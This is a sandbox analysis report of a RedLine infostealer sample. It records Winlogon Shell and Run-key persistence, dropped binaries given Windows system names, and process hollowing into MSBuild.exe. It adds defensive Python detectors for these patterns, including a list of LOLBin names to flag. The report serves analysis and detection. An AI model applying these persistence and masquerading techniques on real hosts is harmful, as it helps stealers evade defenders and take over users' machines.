Malware Analysis Report

2025-01-22 09:21

Sample ID 240706-vqn4lawejn
Target QuwyWare.exe
SHA256 2f87c0abee258364d03ca8fd669dce8dd71f8d30cd568543e9cb90d1f68348fd
Tags
redline sabad0n execution infostealer persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2f87c0abee258364d03ca8fd669dce8dd71f8d30cd568543e9cb90d1f68348fd

Threat Level: Known bad

The file QuwyWare.exe was found to be: Known bad.

Malicious Activity Summary

redline sabad0n execution infostealer persistence

RedLine

RedLine payload

Modifies WinLogon for persistence

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Runs ping.exe

Modifies registry class

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-06 17:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-06 17:11

Reported

2024-07-06 17:14

Platform

win10v2004-20240508-en

Max time kernel

60s

Max time network

65s

Command Line

"C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe"

Signatures

Modifies WinLogon for persistence

persistence
The ten writes below each append one more dropped binary to the Winlogon Shell value (default data: explorer.exe), so Winlogon starts all of them next to the real shell at every interactive logon. They are listed here in the order the value grew: the first five were written by C:\comServerRefcrtNet\ComsurrogateHost.exe and the last five by C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe, i.e. the second stage continued the list the first stage began.
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\", \"C:\\comServerRefcrtNet\\TextInputHost.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\", \"C:\\comServerRefcrtNet\\TextInputHost.exe\", \"C:\\Program Files\\Windows Media Player\\ja-JP\\smss.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\", \"C:\\comServerRefcrtNet\\TextInputHost.exe\", \"C:\\Program Files\\Windows Media Player\\ja-JP\\smss.exe\", \"C:\\comServerRefcrtNet\\powershell.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\", \"C:\\comServerRefcrtNet\\TextInputHost.exe\", \"C:\\Program Files\\Windows Media Player\\ja-JP\\smss.exe\", \"C:\\comServerRefcrtNet\\powershell.exe\", \"C:\\Program Files (x86)\\Google\\CrashReports\\WmiPrvSE.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\", \"C:\\comServerRefcrtNet\\TextInputHost.exe\", \"C:\\Program Files\\Windows Media Player\\ja-JP\\smss.exe\", \"C:\\comServerRefcrtNet\\powershell.exe\", \"C:\\Program Files (x86)\\Google\\CrashReports\\WmiPrvSE.exe\", \"C:\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\explorer.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A

Process spawned unexpected child process

Description Indicator Process Target Count
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe 30

All 30 schtasks.exe launches have WmiPrvSE.exe as their parent, which is what a process started through WMI (for example the Win32_Process Create method) looks like: the WMI provider host, not the caller, shows up as the parent, so the scheduled-task creation cannot be tied back to the dropper from the process tree alone.
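The parent/child anomalies in this report (WmiPrvSE.exe launching schtasks.exe above, and, in the WriteProcessMemory rows later in this section, ZOROLOK.exe running from the user's Temp directory starting MSBuild.exe as its injection host) can be written as a small detection over process-creation events. The block below is an added example, not part of the sandbox report or of its signature set. EVENTS is constructed from the process tree the report records (PIDs 512, 3884, 1988, 2904, 4736, 1704, 4016 and 3860 are the report's own); PIDs 880, 900, 4000, 5100, 5101 and the two benign control events are hypothetical, and WMI_LOLBINS is an assumed list.

```python
"""Parent/child process detections over Sysmon-style process-creation events.

Added example; not part of the sandbox report. EVENTS is constructed from the
process tree recorded in the report (PIDs 512, 3884, 1988, 2904, 4736, 1704,
4016, 3860 are the report's own); PIDs 880, 900, 4000, 5100, 5101 and the two
benign control events are hypothetical.
"""
from __future__ import annotations

import ntpath

EVENTS = [
    {"pid": 512,  "ppid": 4000, "image": r"C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe"},
    {"pid": 3884, "ppid": 512,  "image": r"C:\Users\Admin\AppData\Local\Temp\hwid.exe"},
    {"pid": 1988, "ppid": 512,  "image": r"C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe"},
    {"pid": 2904, "ppid": 3884, "image": r"C:\Windows\SysWOW64\WScript.exe"},
    {"pid": 4736, "ppid": 1988, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"},
    {"pid": 1704, "ppid": 2904, "image": r"C:\Windows\SysWOW64\cmd.exe"},
    {"pid": 4016, "ppid": 1704, "image": r"C:\comServerRefcrtNet\ComsurrogateHost.exe"},
    {"pid": 3860, "ppid": 4016, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # Hypothetical PIDs: the report lists only the images for these launches.
    {"pid": 900,  "ppid": 880,  "image": r"C:\Windows\system32\wbem\wmiprvse.exe"},
    {"pid": 5100, "ppid": 900,  "image": r"C:\Windows\system32\schtasks.exe"},
    {"pid": 5101, "ppid": 900,  "image": r"C:\Windows\system32\schtasks.exe"},
    # Hypothetical benign control: a build tool starting MSBuild is not flagged.
    {"pid": 6000, "ppid": 5000, "image": r"C:\Program Files\dotnet\dotnet.exe"},
    {"pid": 6001, "ppid": 6000, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"},
]

# Children WmiPrvSE.exe ends up launching when something calls WMI's
# Win32_Process.Create: the WMI host, not the caller, becomes the parent.
# Assumed list for this example.
WMI_LOLBINS = {"schtasks.exe", "cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe", "rundll32.exe"}


def image_name(image: str) -> str:
    """Lower-cased file name of an image path (works with backslashes on any OS)."""
    return ntpath.basename(image).lower()


def ancestry(pid: int, by_pid: dict[int, dict]) -> str:
    """Render the recorded ancestor chain of pid as 'name(pid) -> ...', root first."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)                       # guard against PID-reuse loops in the capture
        event = by_pid[pid]
        chain.append(f"{image_name(event['image'])}({pid})")
        pid = event["ppid"]
    return " -> ".join(reversed(chain))


def detect(events: list[dict]) -> list[tuple[str, str]]:
    """Return (rule, ancestry) alerts for the two parent/child patterns in the report."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for event in events:
        parent = by_pid.get(event["ppid"])
        if parent is None:                  # parent not in the capture: nothing to judge
            continue
        child = image_name(event["image"])
        parent_name = image_name(parent["image"])
        parent_dir = ntpath.dirname(parent["image"]).lower()
        if parent_name == "wmiprvse.exe" and child in WMI_LOLBINS:
            rule = "LOLBin launched through WMI (parent is WmiPrvSE.exe)"
        elif child == "msbuild.exe" and r"\appdata\local\temp" in parent_dir:
            rule = "MSBuild.exe started by a binary in a user Temp directory (injection host)"
        else:
            continue
        alerts.append((rule, ancestry(event["pid"], by_pid)))
    return alerts


if __name__ == "__main__":
    for rule, chain in detect(EVENTS):
        print(f"{rule}\n    {chain}")
```

Sysmon event ID 1 already carries ParentImage, so on real telemetry the parent lookup can read that field directly; the pid map is still needed to print the full ancestry, which is what turns "WmiPrvSE.exe spawned schtasks.exe" into something an analyst can act on. The WMI rule deliberately does not try to name the WMI client: that information is only in WMI-Activity tracing, not in the process tree.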

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target Count
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 36
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A 12

C:\comServerRefcrtNet\powershell.exe is one of the sample's dropped binaries (it is registered under the Run keys below), not the PowerShell host in System32; the two share only a file name.

Checks computer location settings

Reading Control Panel\International\Geo\Nation returns the country configured for the user. Stealers commonly use it to skip certain regions, but the same value is also read by legitimate software for locale handling, so on its own this signature is context rather than evidence; note that the query comes from WScript.exe and the hwid.exe helper as well as from the dropper.
Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\hwid.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe N/A

Adds Run key to start application

persistence
Each persisted binary is registered under both the HKLM and the HKCU Run key, with a value name matching the Windows binary it impersonates. The value name powershell is written with two different paths (C:\Program Files\MSBuild\powershell.exe by ComsurrogateHost.exe and C:\comServerRefcrtNet\powershell.exe by RuntimeBroker.exe); only the last write to each hive survives.
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\explorer.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\explorer.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Recovery\\WindowsRE\\cmd.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files\\MSBuild\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\comServerRefcrtNet\\TextInputHost.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Windows Media Player\\ja-JP\\smss.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Recovery\\WindowsRE\\SearchApp.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\comServerRefcrtNet\\TextInputHost.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\comServerRefcrtNet\\unsecapp.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\comServerRefcrtNet\\unsecapp.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files\\MSBuild\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Windows Media Player\\ja-JP\\smss.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\comServerRefcrtNet\\powershell.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\comServerRefcrtNet\\powershell.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Recovery\\WindowsRE\\SearchApp.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Recovery\\WindowsRE\\cmd.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Program Files (x86)\\Google\\CrashReports\\WmiPrvSE.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Program Files (x86)\\Google\\CrashReports\\WmiPrvSE.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
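The Winlogon Shell and Run-key rows above are this sample's persistence. The block below is an added example, not part of the sandbox report or of its signature logic: it parses a Shell value the way Winlogon does (a comma-separated list of command lines, with double quotes protecting commas inside paths) and reports every entry beyond the default explorer.exe, and it checks Run values for Windows binary names running from directories Windows does not ship them in. SNAPSHOT is constructed from the registry data shown in this report plus one hypothetical benign control; WINDOWS_BINARY_NAMES and EXPECTED_DIRS are assumed lists tailored to the names this sample abuses.

```python
"""Audit Winlogon Shell and Run-key data for the persistence this sample sets.

Added example; not part of the sandbox report. SNAPSHOT is constructed from
the registry data shown in the report (on a live host the same values would
be read with winreg or Get-ItemProperty); WINDOWS_BINARY_NAMES and
EXPECTED_DIRS are assumed lists tailored to the names this sample abuses.
"""
from __future__ import annotations

import ntpath

SHELL_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"

SNAPSHOT = {
    SHELL_KEY: (
        r'explorer.exe, "C:\Recovery\WindowsRE\SearchApp.exe", "C:\Recovery\WindowsRE\cmd.exe", '
        r'"C:\comServerRefcrtNet\unsecapp.exe", "C:\Program Files\MSBuild\powershell.exe", '
        r'"C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe", '
        r'"C:\comServerRefcrtNet\TextInputHost.exe", '
        r'"C:\Program Files\Windows Media Player\ja-JP\smss.exe", "C:\comServerRefcrtNet\powershell.exe", '
        r'"C:\Program Files (x86)\Google\CrashReports\WmiPrvSE.exe", '
        r'"C:\Windows\Resources\Themes\aero\Shell\NormalColor\explorer.exe"'
    ),
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker":
        r'"C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe"',
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer":
        r'"C:\Windows\Resources\Themes\aero\Shell\NormalColor\explorer.exe"',
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss":
        r'"C:\Program Files\Windows Media Player\ja-JP\smss.exe"',
    # Hypothetical benign control: the same name in its real directory is not flagged.
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Control":
        r'"C:\Windows\System32\RuntimeBroker.exe" -Embedding',
}

# Windows binary names this sample reuses for its dropped copies (assumed list).
WINDOWS_BINARY_NAMES = {
    "explorer.exe", "runtimebroker.exe", "smss.exe", "wmiprvse.exe", "searchapp.exe",
    "cmd.exe", "powershell.exe", "unsecapp.exe", "textinputhost.exe",
}
# Directories under which Windows ships those binaries; explorer.exe sits in
# C:\Windows itself and is handled separately. Assumed list for this example.
EXPECTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\systemapps")


def split_shell_value(value: str) -> list[str]:
    """Split Winlogon's Shell data into the command lines it launches.

    Winlogon treats the value as a comma-separated list and starts every
    entry; a comma inside double quotes belongs to a path, not to the list.
    Entries are returned verbatim, quotes included.
    """
    entries, current, in_quotes = [], [], False
    for ch in value:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == "," and not in_quotes:
            entries.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    if "".join(current).strip():
        entries.append("".join(current).strip())
    return entries


def executable_of(command: str) -> str:
    """Executable path of a command line: the quoted token, else the first token."""
    command = command.strip()
    if command.startswith('"') and command.count('"') >= 2:
        return command[1:command.index('"', 1)]
    return command.split(" ", 1)[0]


def is_masquerading(exe: str) -> bool:
    """True when exe has a Windows binary name but lives outside the directory
    Windows ships it in (the name/location mismatch this sample relies on)."""
    path = exe.lower()
    name, directory = ntpath.basename(path), ntpath.dirname(path)
    if name not in WINDOWS_BINARY_NAMES or directory == "":
        return False                  # unknown name, or a bare name Windows resolves itself
    if path == r"c:\windows\explorer.exe":
        return False
    return not any(directory == d or directory.startswith(d + "\\") for d in EXPECTED_DIRS)


def audit(snapshot: dict[str, str]) -> list[tuple[str, str, str]]:
    """Return (value path, executable, reason) for every suspicious entry."""
    findings = []
    for value_path, data in snapshot.items():
        if value_path.lower().endswith(r"\winlogon\shell"):
            entries = split_shell_value(data)
            if entries[:1] == ["explorer.exe"]:
                entries = entries[1:]       # the one entry Windows sets by default
            for entry in entries:           # anything else is persistence, whatever its name
                exe = executable_of(entry)
                reason = "extra Winlogon Shell entry"
                if is_masquerading(exe):
                    reason += "; Windows binary name outside its system directory"
                findings.append((value_path, exe, reason))
        else:
            exe = executable_of(data)
            if is_masquerading(exe):
                findings.append((value_path, exe, "Run value: Windows binary name outside its system directory"))
    return findings


if __name__ == "__main__":
    for value_path, exe, reason in audit(SNAPSHOT):
        print(f"{reason}\n    {exe}  ({value_path})")
```

On a live host, feed audit() the Shell data from HKLM plus the Run values of HKLM and of every loaded user hive: this sample writes both hives, so checking only the current user's HKCU misses half of the entries.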

Drops file in System32 directory

Both files are written by csc.exe, the .NET C# compiler: the CSC*.TMP name is its intermediate output, and rpvymf.exe is a binary compiled on the host at run time. The same csc.exe pattern recurs below for C:\Program Files\MSBuild\powershell.exe and C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe, so file hashes of those stages may differ between infections and are weak indicators on their own.
Description Indicator Process Target
File created \??\c:\Windows\System32\CSC284368D78044F41BA30132654ADC74A.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\rpvymf.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Suspicious use of SetThreadContext

Together with the eight WriteProcessMemory calls from PID 1988 into PID 4736 listed further down, this is the process-hollowing pattern: a suspended MSBuild.exe is overwritten with a payload and its main thread's context is redirected into it, so the injected code runs under the name of a Microsoft-signed binary.
Description Indicator Process Target
PID 1988 set thread context of 4736 N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Google\CrashReports\WmiPrvSE.exe C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
File created C:\Program Files (x86)\Google\CrashReports\24dbde2999530e C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
File created \??\c:\Program Files\MSBuild\CSCA9C160C1AA0842E0AAA271B7FBC3FCF.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\MSBuild\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\MSBuild\powershell.exe C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Program Files\MSBuild\e978f868350d50 C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Program Files\Windows Media Player\ja-JP\69ddcba757bf72 C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
File created C:\Program Files\ModifiableWindowsApps\Idle.exe C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
File created C:\Program Files\Windows Media Player\ja-JP\smss.exe C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Windows\SoftwareDistribution\Download\9e8d7a4ca61bd9 C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Windows\Resources\Themes\aero\Shell\NormalColor\explorer.exe C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
File created C:\Windows\Resources\Themes\aero\Shell\NormalColor\7a0fd90576e088 C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
File created \??\c:\Windows\SoftwareDistribution\Download\CSC843AFAE444044DF9A627B2B89B543F.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\hwid.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\comServerRefcrtNet\ComsurrogateHost.exe N/A

Runs ping.exe

This section does not capture ping's command line. In cmd.exe chains like the one in this sample, ping is as often a sleep (ping -n <count> 127.0.0.1) as a real connectivity test, so it is not by itself evidence of network activity.

Description Indicator Process Target Count
N/A N/A C:\Windows\system32\PING.EXE N/A 2

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Count
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A 64

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target Count
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A 1
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 36
Token: SeDebugPrivilege N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A 2
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A 13

Suspicious use of WriteProcessMemory

Two or three writes from a parent into a child it has just created are produced by CreateProcess itself (the parent writes the new process's startup parameters) and the sandbox reports them for benign launches too; they are useful here mainly because they reveal the process tree. The eight writes from ZOROLOK.exe (PID 1988) into MSBuild.exe (PID 4736), paired with the SetThreadContext call above, are the actual injection.

Description Indicator Process Target Count
PID 512 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\hwid.exe 3
PID 512 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe 3
